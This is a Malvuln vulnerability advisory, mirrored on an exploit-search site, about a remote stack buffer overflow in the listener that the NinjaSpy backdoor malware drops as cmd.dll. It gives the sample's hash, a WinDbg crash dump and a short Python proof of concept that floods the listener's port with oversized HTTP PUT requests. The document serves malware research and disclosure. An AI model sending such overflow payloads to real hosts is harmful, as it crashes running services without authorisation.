Share
## https://sploitus.com/exploit?id=PACKETSTORM:160865
Discovery / credits: malvuln - Malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.NinjaSpy.c  
Vulnerability: Remote Stack Buffer Overflow  
Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payload of characters we can cause buffer overflow.  
  
Type: PE32  
MD5: 6eece319bc108576bd1f4a8364616264  
Vuln ID: MVID-2021-0018  
Dropped files: cmd.dll  
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 01/08/2021  
  
Memory Dump:  
0:000> .ecxr  
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d  
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202  
cmd+0x40f57:  
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 ds:002b:414142c1=????????  
  
FAULTING_IP:   
cmd+40f57  
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 00440f57 (cmd+0x00040f57)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 414142c1  
Attempt to read from address 414142c1  
  
PROCESS_NAME: cmd.dll  
  
OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: 414142c1  
  
READ_ADDRESS: 414142c1   
  
FOLLOWUP_IP:   
cmd+40f57  
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAULTING_THREAD: 000014f4  
  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57  
0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b  
0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20  
0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be  
0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3  
0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a  
0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d  
0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc  
0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118  
0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b  
0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20  
0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f  
0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115  
0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25  
0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b  
0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20  
0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be  
0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff  
0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137  
0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8  
0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b  
0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc  
0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a  
0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743  
0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a  
0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f  
0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446  
0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b  
0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20  
0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be  
0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac  
0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10  
0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c  
0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c  
0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24  
0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f  
0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b  
  
  
STACK_COMMAND: ~0s; .ecxr ; kb  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: cmd+40f57  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: cmd  
  
IMAGE_NAME: cmd.dll  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19  
  
FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57  
  
  
Exploit/PoC:  
from socket import *  
  
MALWARE_HOST="x.x.x.x"  
PORT=2004  
c=1  
JUNK="A"*8601  
AMT=10  
PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+ "Accept-Charset: "+JUNK  
  
def doit():  
global c, JUNK, PAYLOAD, AMT  
while True:  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))  
s.send(PAYLOAD)  
s.close()  
c+=1  
if c==AMT:  
print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")  
print("MD5: 6eece319bc108576bd1f4a8364616264")  
print("By Malvuln")  
exit()  
  
if __name__=="__main__":  
doit()  
  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).